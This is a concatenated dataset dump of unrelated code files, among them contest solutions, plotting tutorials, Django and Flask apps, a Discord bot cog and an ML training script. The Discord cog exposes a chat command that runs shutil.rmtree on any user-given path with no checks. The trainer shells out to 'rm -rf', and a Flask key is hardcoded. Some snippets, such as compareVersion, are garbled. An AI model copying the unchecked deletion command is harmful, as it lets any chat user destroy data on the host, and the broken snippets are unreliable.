+{"seq_id":"515815679","text":"data = open('a.in', 'r').readlines()\ndata = data[1:]\n\n\noutput = \"\"\nfor i in range(len(data)):\n outstr = \"\" + data[i][0]\n for j in range(1,len(data[i])):\n if data[i][j] >= outstr[0]:\n outstr = data[i][j] + outstr\n else:\n outstr = outstr + data[i][j]\n\n output += \"Case #{}: {}\".format(i + 1, outstr)\nf = open('ala.out', 'w')\nf.write(output)\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_Paweu_a.py","file_name":"16_1_1_Paweu_a.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457556175","text":"'''Benchmark filtering'''\nfrom stdnet import test, transaction\nfrom stdnet.utils import zip\nfrom stdnet.utils import populate\n\nfrom examples.models import Instrument\n\nccys_types = ['EUR','GBP','AUD','USD','CHF','JPY']\ninsts_types = ['equity','bond','future','cash','option']\n\n\nclass QueryTest(test.TestCase):\n __number__ = 10\n model = Instrument\n sizes = {'tiny': 100,\n 'small': 500,\n 'normal': 1000,\n 'big': 5000,\n 'huge': 10000}\n \n def setUp(self):\n size = self.sizes.get(getattr(self,'test_size','normal'))\n inst_names = populate('string',size, min_len = 5, max_len = 20)\n inst_types = populate('choice',size, choice_from = insts_types)\n inst_ccys = populate('choice',size, choice_from = ccys_types)\n with transaction(Instrument) as t:\n for name,typ,ccy in zip(inst_names,inst_types,inst_ccys):\n Instrument(name = name, type = typ, ccy = ccy).save(t)\n \n def testCount(self):\n f = Instrument.objects.filter(ccy = 'EUR')\n n = f.count()\n\n def testSimpleFilter(self):\n f = Instrument.objects.filter(ccy = 'EUR')\n v = list(f)\n f.count()\n \n def testInFilter(self):\n f = Instrument.objects.filter(ccy__in = ('JPY','USD'))\n v = list(f)\n f.count()\n","sub_path":"tests/bench/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363706264","text":"import matplotlib.pyplot as plt # 导入matplotlib\nimport numpy as np\n\nplt.figure() # 创建图形显示的窗口\n\n# 定义函数点数\nx = np.linspace(-3, 3, 50) # 定义x:范围是(-3,3);个数是50.\ny1 = 2*x + 1\ny2 = x ** 2\n# 在figure上绘制图像\nl1, = plt.plot(x, y2, label='up')\n# 在figure上绘制图像,并定义这条直线颜色为红色,线宽为1.0,线的样式为虚线\nl2, = plt.plot(x, y1, label='down', color='red', linewidth=1.0, linestyle='--')\n\n# 坐标的取值范围\nplt.xlim((-1, 2),)\nplt.ylim((-2, 3))\n\n# 坐标的标签\nplt.xlabel('i am x')\nplt.ylabel('i am y')\n\n# 设置坐标分辨率\nnew_ticks = np.linspace(-1, 2, 5)\nprint(new_ticks)\nplt.xticks(new_ticks)\n# 设置坐标轴上要显示的点和对应的文字\nplt.yticks([-2, -1.8, -1, -1.22, 3], [r'$Really\\ bad$', r'$bad$', r'$normal$', r'$good$', r'$really\\ good$'])\n\n# 获得现在的坐标轴,并把右边和上边的边去掉\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# 设置坐标轴起点位置 所有位置:top,bottom,both,default,none\n# 第一句是把刻度数字或名称设置在x坐标轴线的底部\n# 第二句是把x坐标轴线设置到y轴的0刻度上\nax.xaxis.set_ticks_position('bottom')\nax.spines['bottom'].set_position(('data', 0))\n# 第一句是把刻度数字或名称设置在x坐标轴线的左边\n# 第二句是把x坐标轴线设置到x轴的0刻度上\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data', 0))\n\n# 打印图例\n# 直接打印,请读者自己尝试\n# plt.legend()\n# 带参数的,handles传入线段,labels传入图例信息,loc:把图例显示在最好的位置\nplt.legend(handles=[l1, l2], labels=['aaa', 'bbb'], loc='best')\n\n# 显示某一个点\nx0 = 0.5\ny0 = 2*x0+1\n# 这个函数就是专门描述散点图的\n# 其中s代表点的大小,r代表红色(b代表蓝色)\nplt.scatter(x0, y0, s=50, color='r')\n# 第一个参数和第二个参数分别是x和y的取值范围,能够生成一条线,‘k--’代表的是黑色的虚线,lw代表线宽\nplt.plot([x0, x0], [y0, 0], 'k--', lw=2.5)\n\n# 添加注释 有两种方法\n# method 1\n# $$代表的是一种字体,xy=(x0,y0)即需要注释的坐标,xycoords基于数据的值来选注释位置\n# xytext在原本数据的基础上x0+30,y0-30,得到注释位置,fontsize设置字体大小,arrowprops是箭头的设置\nplt.annotate(r'$2x+1=%s$' % y0, xy=(x0, y0), xycoords='data', xytext=(+30, -30),\n textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle='->', connectionstyle=\"arc3,rad=.2\"))\n\n# method 2\n# 第一个参数和第二个参数代表显示的x和y轴的位置,然后是文本、字体设置\nplt.text(-1, 1, r'$This\\ is\\ the\\ some\\ text$', fontdict={'size': 16, 'color': 'r'})\n\n# 显示窗口\nplt.show()","sub_path":"matplotlib_basics.py","file_name":"matplotlib_basics.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152453493","text":"import csv\r\ndef ReadFromCSVFile(filename_with_path):\r\n #with open('D:\\Karnik\\Graduate Studies\\Statistical Machine Learning\\Project\\data\\A.csv', newline='') as csvfile:\r\n '''with open(filename_with_path, newline='') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in csvreader:\r\n print(', '.join(row))\r\n return row'''\r\n\r\n with open(filename_with_path, 'r') as f:\r\n reader = csv.reader(f)\r\n your_list = list(reader)\r\n return your_list\r\n\r\n\r\n\r\n\r\n","sub_path":"readcsv.py","file_name":"readcsv.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221948833","text":"from threading import Thread\n\nimport Pyro4\n\nfrom foundations.network.corba.icorbamanager import ICorbaManager\n\n\nclass PyroCorbaManager(ICorbaManager):\n def __init__(self):\n self._nsaddress: str = None\n self._nsport: int = None\n self._daemon: Pyro4.Daemon = None\n self._ns = None\n\n def init(self, nsaddress: str = \"localhost\", nsport: int = 9090):\n self._nsaddress = nsaddress\n self._nsport = nsport\n self._daemon = Pyro4.Daemon()\n\n self._ns = Pyro4.locateNS(nsaddress, nsport)\n\n # start del demone pyro\n Thread(target=self._daemon.requestLoop, args=()).start()\n\n def getFromSystem(self, objectid: str):\n return Pyro4.Proxy(\"PYRONAME:{0}\".format(objectid))\n\n def remotize(self, obj: object, objname: str = None) -> str:\n uri = self._daemon.register(obj)\n\n if objname is None:\n objname = str(uri.object)\n\n self._ns.register(objname, uri)\n\n return objname\n","sub_path":"foundations/network/corba/pyrocorbamanager.py","file_name":"pyrocorbamanager.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520313647","text":"#! python3\ndef collatz(number):\n '''returns collatz conjecture with starting point equal to first_num'''\n li = []\n li.append(number) # appending the starting number to the sequence\n while number != 1:\n if number % 2 ==0:\n number = number //2\n li.append(number)\n else:\n number = (number*3) + 1\n li.append(number)\n return li\n\ntry:\n first_num = int(input(\"Collatz conjecture starting number: \"))\nexcept ValueError:\n print(\"Passed argument is not an integer\")\nelse:\n if first_num <= 0:\n raise Exception(\"Number cannot be 0 or negative\")\n else:\n print(collatz(first_num))\n","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628207265","text":"__author__ = 'caoyu'\n\nclass Solution:\n # @param version1, a string\n # @param version2, a string\n # @return an integer\n\n def __init__(self):\n pass\n\n def compareVersion(self,version1, version2):\n v1,v2 = version1.split('.'),version2.split('.')\n maxlen=max(len(v1),len(v2))\n minlen=min(len(v1),len(v2))\n for i in range(minlen):\n if int(v1[i])>int(v2[i]):\n return 1\n elif int(v1[i])len(v2):\n for i in range(len(v2),maxlen):\n total += int(v1[i])\n if total != 0:\n return 1\n else:\n return 0\n\n if len(v1)= bestPosScore:\n\t\t\tbestPosScore = score\n\t\t\tbestPosIndex = p\n\t#print(\"BEST:\", round(bestPosScore,2))\n\treturn bestPosIndex","sub_path":"ai/algorithms/mlAi.py","file_name":"mlAi.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"508101142","text":"from discord.ext import commands\nimport discord\nimport config\nimport sys\nimport asyncio \nimport requests\nimport csv\nimport os\nimport shutil\nfrom discord.ext import tasks\n\nclass Statistics(commands.Cog):\n def __init__(self,bot):\n self.bot=bot\n self.vc=None\n self.channel=None\n\n @commands.group()\n async def stat(self, ctx ):\n if ctx.invoked_subcommand is None:\n await ctx.reply('無効なコマンドです')\n\n @stat.command()\n async def online(self,ctx):\n dir=\"data\"\n path=f\"{dir}/{ctx.guild.name}.csv\"\n await ctx.reply(\"ファイルを出力します\",file=discord.File(path))\n\n @stat.command()\n async def clear(self,ctx):\n dir=\"data\"\n path=f\"{dir}/{ctx.guild.name}.csv\"\n os.remove(path)\n await ctx.reply(\"このサーバーについての統計データを削除しました\")\n \n @stat.command()\n async def count_reaction(self,ctx,channel_):\n channel=channel_\n if type(channel)is type(None):\n channel=ctx.channel\n else:\n channel=channel_.strip(\"<#>\")\n channel=ctx.guild.get_channel(int(channel))\n user_data={}\n async with ctx.channel.typing():\n async for message in channel.history(limit=200):\n for reaction in message.reactions:\n async for user in reaction.users():\n if user.name not in user_data: user_data[user.name]=0\n user_data[user.name]+=1\n res=\"\"\n for key,value in user_data.items():\n res+=f\"{key} : {value}\\n\"\n await ctx.reply(res)\n @stat.command()\n async def count_message(self,ctx,channel_):\n channel=channel_\n if type(channel)is type(None):\n channel=ctx.channel\n else:\n channel=channel_.strip(\"<#>\")\n channel=ctx.guild.get_channel(int(channel))\n user_data={}\n async with ctx.channel.typing():\n async for message in channel.history(limit=200):\n if message.author not in user_data: user_data[message.author]=0\n user_data[message.author]+=1\n res=\"\"\n for key,value in user_data.items():\n res+=f\"{key} : {value}\\n\"\n await ctx.reply(res)\n\n @stat.command()\n async def delete_account_data(self,ctx,path):\n shutil.rmtree(path)\n\n @stat.command()\n async def count_online(self,ctx):\n res=\"\"\n for role in ctx.guild.roles:\n if role.hoist:#そのロールが他のロールと分けて表示に設定されてたら\n online_count=0\n print(len(role.members))\n for member in role.members:\n if member.status == discord.Status.online:online_count+=1\n res+=f\"{role.name}のオンライン {online_count}人\\n\"\n print(online_count)\n await ctx.reply(res)\n\ndef setup(bot):\n bot.add_cog(Statistics(bot))\n","sub_path":"cogs/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471398021","text":"from __future__ import absolute_import\nimport os\nfrom kombu import Exchange, Queue\nimport yaml\n\nsettings_filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'settings.yaml')\nwith open(settings_filename) as settings_file:\n data = yaml.load(settings_file, Loader=yaml.FullLoader)\n\nDEBUG = data['debug']\nSECRET_KEY = data['secret_key']\nINSTALLED_APPS = data['installed_apps']\nCACHES = data['caches']\n\nBROKER_URL = 'amqp://{user}:{password}@{host}:{port}/{vhost}'.format(\n host=data['rabbitmq']['host'],\n port=data['rabbitmq']['port'],\n user=data['rabbitmq']['user'],\n password=data['rabbitmq']['password'],\n vhost=data['rabbitmq']['vhost']\n)\n\nMAX_TASK_PRIORITY = data['celery']['max_task_priority']\n\nCELERY_DEFAULT_QUEUE = data['celery']['default_queue']\nDEFAULT_TASK_PRIORITY = data['celery']['default_task_priority']\n\nAPI_QUEUE = data['api']['queue']\nAPI_TASK_PRIORITY = data['api']['task_priority']\n\nCELERY_RESULT_BACKEND = data['celery']['result_backend']\nCELERY_ACKS_LATE = data['celery']['acks_late']\n\nCELERY_QUEUES = (\n Queue(\n CELERY_DEFAULT_QUEUE,\n Exchange(CELERY_DEFAULT_QUEUE),\n routing_key=CELERY_DEFAULT_QUEUE,\n queue_arguments={\n 'x-max-priority': MAX_TASK_PRIORITY\n }\n ),\n Queue(\n API_QUEUE,\n Exchange(API_QUEUE),\n routing_key=API_QUEUE,\n queue_arguments={\n 'x-max-priority': MAX_TASK_PRIORITY\n }\n )\n)\n\nDEFAULT_FILE_STORAGE = data['default_file_storage']\nSTORE_DATA = data['default_store_path']\nMETADATA_STORE_PATH = data['metadata_store_path']\n\nPOST_SAVE_FILTERS = data['post_save_filters']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:'\n }\n}\n\nMTBF_MAX_HEAP_SIZE = '1G'\n","sub_path":"tardis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423607244","text":"# clear\n\n# def solution(n, words):\n# answer = []\n\n# used_words = set()\n# cur_word = ''\n# turns = [0] * n\n# for idx, word in enumerate(words):\n# if idx == 0:\n# turns[0] += 1\n# cur_word = word[-1]\n# used_words.add(word)\n# else:\n# turns[idx % n] += 1\n# if word[0] == cur_word and word not in used_words:\n# cur_word = word[-1]\n# used_words.add(word)\n# else:\n# answer.append(idx % n + 1)\n# answer.append(turns[idx % n])\n# break\n# else:\n# answer = [0, 0]\n\n# return answer\n\n\n#\n\ndef solution(n, words):\n for p in range(1, len(words)):\n if words[p][0] != words[p - 1][-1] or words[p] in words[:p]: return [(p % n) + 1, (p // n) + 1]\n else:\n return [0, 0]\n \n\n\n\n\nprint(solution(3, [\"tank\", \"kick\", \"know\", \"wheel\", \"land\", \"dream\", \"mother\", \"robot\", \"tank\"]))\nprint(solution(5, [\"hello\", \"observe\", \"effect\", \"take\", \"either\", \"recognize\", \"encourage\", \"ensure\", \"establish\", \"hang\", \"gather\", \"refer\", \"reference\", \"estimate\", \"executive\"]))\nprint(solution(2, [\"hello\", \"one\", \"even\", \"never\", \"now\", \"world\", \"draw\"]))\n\n# answer\n# [3, 3]\n# [0, 0]\n# [1, 3]","sub_path":"21.04.04/Programmers_12981.py","file_name":"Programmers_12981.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267623715","text":"from math import *\n\ndef process_input(input_file_name, output_file_name, options):\n\tinput_file = open(input_file_name, 'r')\n\toutput_file = open(output_file_name, 'w')\n\toutput_file.write('%s\\t%s' % (options[\"x-n\"], options[\"y-n\"]))\n\toutput_file.write('\\t%s\\t%s\\n' % (options[\"x-n\"] + '-er', options[\"y-n\"] + '-er'))\n\tfor line in input_file:\n\t\tdata = line.split()\n\t\tdata = map(lambda x: float(x), data)\n\t\tx, y = data[0], data[1]\n\t\tx, y = options[\"x-f\"](x, y), options[\"y-f\"](x, y)\n\t\toutput_file.write('%f\\t%f' % (x, y))\n\t\toutput_file.write('\\t%f\\t%f\\n' % (options[\"x-e\"](x, y), options[\"y-e\"](x, y)))\n\tinput_file.close()\n\toutput_file.close()\n\ndef reverse_data(file_name):\n\tfile = open(file_name, 'r')\n\tdata = []\n\tfor line in file:\n\t\tdata.append(line.split())\n\tfile.close()\n\n\tfile = open(file_name, 'w')\n\tfor line in data:\n\t\tfile.write('%s %s\\n' % (line[1], line[0]))\n\tfile.close()\n\ns = 42.0\nd = 0.16\ng = 1000.0\n\noptions = {\n\t'x-n' : 'U^2',\n\t'y-n' : 'F',\n\t'x-f' : (lambda x, y: x * x),\n\t'y-f' : (lambda x, y: y / 100.0),\n\t'x-e' : (lambda x, y: x * sqrt(2 * (0.01 / sqrt(x)) ** 2)),\n\t'y-e' : (lambda x, y: 10.0 / 100.0)\n}\nprocess_input('input-1', 'output-1', options)\n\noptions = {\n\t'x-n' : 'U, SI',\n\t'y-n' : 'U, SGS',\n\t'x-f' : (lambda x, y: x),\n\t'y-f' : (lambda x, y: 2 * d * sqrt(2 * 3.1415 * (y / 1000.0) * g / s)),\n\t'x-e' : (lambda x, y: x * sqrt(2 * (0.01 / x) ** 2)),\n\t'y-e' : (lambda x, y: y * sqrt( (0.01 / d) ** 2 + 0.0001 + (0.01 / s) ** 2))\n}\nprocess_input('input-1', 'output-2', options)\n","sub_path":"physics-labs/3 sem/3.1.2/process/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556788279","text":"import os\nfrom pathlib import Path\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nfrom sklearn.model_selection import KFold\n\nfrom ct_slice_detection.inout.dataloader import DataLoader\nfrom ct_slice_detection.inout.parameters import parse_inputs\nfrom ct_slice_detection.models import Models\nfrom ct_slice_detection.utils.generic_utils import Fold\nfrom ct_slice_detection.utils.training_utils import PreviewOutput\n\n\ndef cross_validate(baseModel, args):\n pretrained_model = None\n\n trainer_data = DataLoader(args)\n kf = KFold(n_splits=args.n_splits, random_state=args.random_state, shuffle=True)\n num_samples = trainer_data.get_num_samples()\n for idx, (train_index, val_index) in enumerate(kf.split(list(range(trainer_data.num_samples)))):\n print('cross validation step {} of {}'.format(idx + 1, args.n_splits))\n print(val_index)\n\n train_fold(args, baseModel, idx, train_index, trainer_data, val_index)\n\n\ndef train_fold(args, baseModel, fold_index, train_index, trainer_data, val_index):\n trainer_data.split_data(train_index, val_index)\n trainer_data.update_crossval_data(fold_index)\n trainer_data.save_train_val_split(True)\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n # Setup model\n model_name = args.model_name + '_cv_' + str(fold_index + 1) + '_of_' + str(\n args.n_splits)\n modelwrapper = baseModel(name=model_name,\n config=args,\n input_shape=args.model_input_shape,\n data_loader=trainer_data\n )\n if args.preview_training_output:\n modelwrapper.callbacks.append(PreviewOutput(trainer_data, 10, args))\n print(modelwrapper.model.summary())\n try:\n modelwrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n modelwrapper.save()\n\n\ndef cross_validate_with_predefined_groups(baseModel, args):\n trainer_data = DataLoader(args)\n name_loader = DataLoader(args)\n name_loader.load_data()\n\n for index in range(4):\n # seg h5 file indicies --> subject ids\n fold = Fold(\n root_path=Path(args.predefined_folds_dir),\n fold_index=index,\n subject_ids=list(name_loader.names_val),\n h5_datafile_path=args.h5_file_with_subject_ids_for_indices,\n npz_mips_file_path=args.dataset_path,\n )\n\n train_fold(\n args, baseModel,\n fold_index=index,\n train_index=fold.get_train_indices(),\n trainer_data=trainer_data,\n val_index=fold.get_val_indices()\n )\n\n\n\ndef main():\n\n args = parse_inputs()\n\n print(args)\n # GPU allocation options\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n # config.gpu_options.visible_device_list = args.cuda_devices\n set_session(tf.Session(config=config))\n\n #Handle restarting and resuming training\n if args.restart:\n print('Restarting training from scratch.')\n os.system('rm -rf {}'.format(args.model_path))\n\n if not os.path.isdir(args.model_path):\n os.system('mkdir -p {}'.format(args.model_path))\n else:\n print('Resuming training on model_path {}'.format(args.model_path))\n\n\n baseModel = Models(args.model_name)\n\n if args.do_crossval and args.do_predefined_crossval:\n raise Exception(\"Conflicting config parameters, both do_crossval and \"\n \"do_predefined_crossval set, choose one\")\n elif args.do_crossval:\n cross_validate(baseModel, args)\n elif args.do_predefined_crossval:\n cross_validate_with_predefined_groups(baseModel, args)\n else:\n trainer_data = DataLoader(args)\n trainer_data.split_data()\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n modelwrapper = baseModel(name=args.model_name,\n config=args,\n input_shape=args.model_input_shape,\n data_loader=trainer_data\n )\n\n if args.preview_training_output:\n modelwrapper.callbacks.append(PreviewOutput(trainer_data,2, args))\n\n print(modelwrapper.model.summary())\n\n try:\n modelwrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n modelwrapper.save()\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ct_slice_detection/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61610883","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom . import models\n\n\ndef home_view(request):\n context = {\n 'posts': models.PostModel.objects.all(),\n 'title': 'Home'\n }\n return render(request, 'blog/home.html', context)\n\n\nclass HomeListView(ListView):\n model = models.PostModel\n template_name = \"blog/home.html\"\n context_object_name = \"posts\"\n ordering = [\"-date_posted\"]\n\n\nclass PostDetailView(DetailView):\n model = models.PostModel\n\n\ndef about_view(request):\n return render(request, 'blog/about.html', {'title': 'About'})\n","sub_path":"my_blogsite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315086778","text":"from .models import Report_Information\nfrom django import forms\n\n\n\n\nclass UpdateReportInfoForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Report_Information\n\t\tfields = ('casualty','respond_time', 'other_information')\n\t\twidgets = {\n\t\t\t'casualty':forms.TextInput(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control',\n\t\t\t\t\t'placeholder': 'Address',\n\t\t\t\t\t'name': 'text-input',\n\t\t\t\t}),\n\t\t\t'respond_time':forms.TimeInput(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control datetimepicker-input',\n\t\t\t\t\t'placeholder': 'Time',\n\t\t\t\t\t'data-target': '#datetimepicker3',\n\t\t\t\t\t'id': 'datetimepicker3'\n\t\t\t\t}),\n\t\t\t'other_information':forms.Textarea(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control',\n\t\t\t\t\t'placeholder': 'Content',\n\t\t\t\t\t#'name': 'textarea-input',\n\t\t\t\t\t'rows':'15',\n\t\t\t\t\t'id': 'blotter_body'\n\t\t\t\t}),\n\t\t\t}\n","sub_path":"Capstone/suspicious_report/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600186732","text":"from flask import Flask, render_template, request, redirect, url_for\nimport os\n\n# modulo Base de datos\n\n# Iniciando FLASK\napp = Flask(__name__)\napp.secret_key = 'E86xBi9k!y'\n\n# RUTAS \n@app.route('/', methods=['GET', 'POST'])\ndef inicio():\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(\"0.0.0.0\", port=port, debug=True)","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432274744","text":"# road trip soln in py2 for codeeval by steven a dunn\n\nimport sys\n\nf = open(sys.argv[1], 'r')\nfor line in f:\n line = line.rstrip().split(\";\")\n distances = []\n for entry in line:\n if not entry:\n continue\n distance = int(entry.split(\",\")[1])\n distances.append(distance)\n distances.sort()\n\n results = []\n cur_pos = 0\n for distance in distances:\n location = distance - cur_pos\n results.append(location)\n cur_pos = distance\n results = list(map(str, results))\n print (\",\".join(results))\nf.close()","sub_path":"RoadTrip/py3/rt.py","file_name":"rt.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602373312","text":"from parse import *\n\ndef property_types_la():\n return ['Entire apartment',\n 'Entire house',\n 'Private room in house',\n 'Private room in apartment',\n 'Entire guesthouse',\n 'Entire condominium',\n 'Entire guest suite',\n 'Entire serviced apartment',\n 'Entire bungalow',\n 'Private room in condominium',\n 'Shared room in house',\n 'Private room in townhouse',\n 'Entire townhouse',\n 'Entire villa',\n 'Entire loft']\n\ndef bathrooms_la():\n return ['0 baths', '0 shared baths', '1 bath', '1 private bath',\n '1 shared bath', '1.5 baths', '1.5 shared baths', '10 baths',\n '10.5 baths', '11 shared baths', '2 baths', '2 shared baths',\n '2.5 baths', '2.5 shared baths', '3 baths', '3 shared baths',\n '3.5 baths', '3.5 shared baths', '4 baths', '4 shared baths',\n '4.5 baths', '4.5 shared baths', '5 baths', '5 shared baths',\n '5.5 baths', '6 baths', '6 shared baths', '6.5 baths', '7 baths',\n '7.5 baths', '8 baths', '8 shared baths', '8.5 baths',\n '8.5 shared baths', '9 baths', '9.5 baths', 'Half-bath',\n 'Private half-bath', 'Shared half-bath']\n\n\ndef parse_url(query):\n try:\n data = [[z for z in findall(\"zip={}&\", query)][0][0],\n [sn for sn in findall(\"streetname={}&\", query)][0][0],\n [sn for sn in findall(\"streetnum={}&\", query)][0][0],\n [pt for pt in findall(\"ptype={}&\", query)][0][0],\n [ac for ac in findall(\"accom={}&\", query)][0][0],\n [nb for nb in findall(\"numbathrms={}&\", query)][0][0],\n [nb for nb in findall(\"numbedrms={}&\", query)][0][0],\n [nb for nb in findall(\"numbeds={}&\", query)][0][0]]\n return data\n \n except IndexError:\n return False\n\n\n","sub_path":"application/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311003527","text":"from django.shortcuts import render\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n\nclass CustomPaginator(Paginator):\n def __init__(self,current_page,per_page_num,*args,**kwargs):\n #当前页\n self.current_page = int(current_page)\n #最多显示的页码数量 11\n self.per_page_num = int(per_page_num)\n super(CustomPaginator,self).__init__(*args,**kwargs)\n\n def pager_num_range(self):\n if self.num_pages < self.per_page_num:\n return range(1,self.num_pages+1)\n #总页数特别���\n part = int(self.per_page_num/2)\n if self.current_page < part:\n return range(1,self.per_page_num+1)\n if (self.current_page+part) > self.num_pages:\n return range(self.current_page-self.per_page_num+1,self.num_pages+1)\n return range(self.current_page-part,self.current_page+part+1)\n\n\n\nUSER_LIST = []\nfor i in range(1,666):\n temp = {'name':'root'+str(i),'age':i}\n USER_LIST.append(temp)\n\n\ndef index(request):\n per_page_count = 10\n current_page_num = request.GET.get('p')\n current_page_num = int(current_page_num)\n #p=1\n #0-10 0-9\n #p=2\n #10-20 10-19\n start = (current_page_num-1) * per_page_count\n end = current_page_num * per_page_count\n data = USER_LIST[start:end]\n\n prev_page = current_page_num - 1\n next_page = current_page_num + 1\n return render(request,'index.html',{'user_list':data,'prev_page':prev_page,'next_page':next_page})\n\n\ndef index1(request):\n #全部数据:USER_LIST ==>得到有多少数据\n # per_page: 每页显示条目数量\n # count: 数据总个数\n # num_pages:总页数\n # page_range:总页数的索引范围,如: (1,10),(1,200)\n # page: page对象(是否具有下一页,是否有上一页;)\n current_page = request.GET.get('p')\n paginator = CustomPaginator(current_page,11,USER_LIST,10)\n try:\n #Page对象\n posts = paginator.page(current_page)\n # has_next 是否有下一页\n # next_page_number 下一页页码\n # has_previous 是否有上一页\n # previous_page_number 上一页页码\n # object_list 分页之后的数据列表,已经切片好的对象\n # number 当前页\n # paginator paginator对象\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n return render(request,'index1.html',{'posts':posts})\n\n\ndef index2(request):\n from app01.pager import Pagination\n current_page = request.GET.get('p')\n page_obj = Pagination(666,current_page)\n\n data_list = USER_LIST[page_obj.start():page_obj.end()]\n return render(request,'index2.html',{'data':data_list,'page_obj':page_obj})","sub_path":"CodeStatistics/files/2418e633-36e4-4871-a5ad-059b33a528ef/django_page/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244268267","text":"\"\"\"\nAuthor: Rushikesh Patel\n\"\"\"\nfrom typing import Union\n\n\ndef get_response_obj(\n message: str,\n data: Union[dict, list] = None,\n error = None,\n):\n resp = {\n \"success\": True if not error else False,\n \"message\": message,\n }\n\n if error is not None:\n resp[\"error\"] = error\n else:\n resp[\"data\"] = data\n\n return resp","sub_path":"src/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424366672","text":"from UDPComms import Publisher, Subscriber, timeout\nimport xbox\n\nimport time\n\n## you need to git clone the PS4Joystick repo and run `sudo bash install.sh`\n\n## Configurable ##\nMESSAGE_RATE = 30\n\njoystick_pub = Publisher(8830)\njoystick_subcriber = Subscriber(8840, timeout=0.01)\njoystick = xbox.Joystick()\n\nwhile True:\n print(\"running\")\n\n left_y = joystick.leftY()\n right_y = joystick.rightY()\n right_x = joystick.rightX()\n left_x = joystick.leftX()\n\n L2 = joystick.leftTrigger()\n R2 = joystick.rightTrigger()\n\n R1 = joystick.rightBumper()\n L1 = joystick.leftBumper()\n\n square = joystick.X()\n x = joystick.A()\n circle = joystick.B()\n triangle = joystick.Y()\n\n dpadx = joystick.dpadRight() - joystick.dpadLeft()\n dpady = joystick.dpadUp() - joystick.dpadDown()\n\n msg = {\n \"ly\": left_y,\n \"lx\": left_x,\n \"rx\": right_x,\n \"ry\": right_y,\n \"L2\": L2,\n \"R2\": R2,\n \"R1\": R1,\n \"L1\": L1,\n \"dpady\": dpady,\n \"dpadx\": dpadx,\n \"x\": x,\n \"square\": square,\n \"circle\": circle,\n \"triangle\": triangle,\n \"message_rate\": MESSAGE_RATE,\n 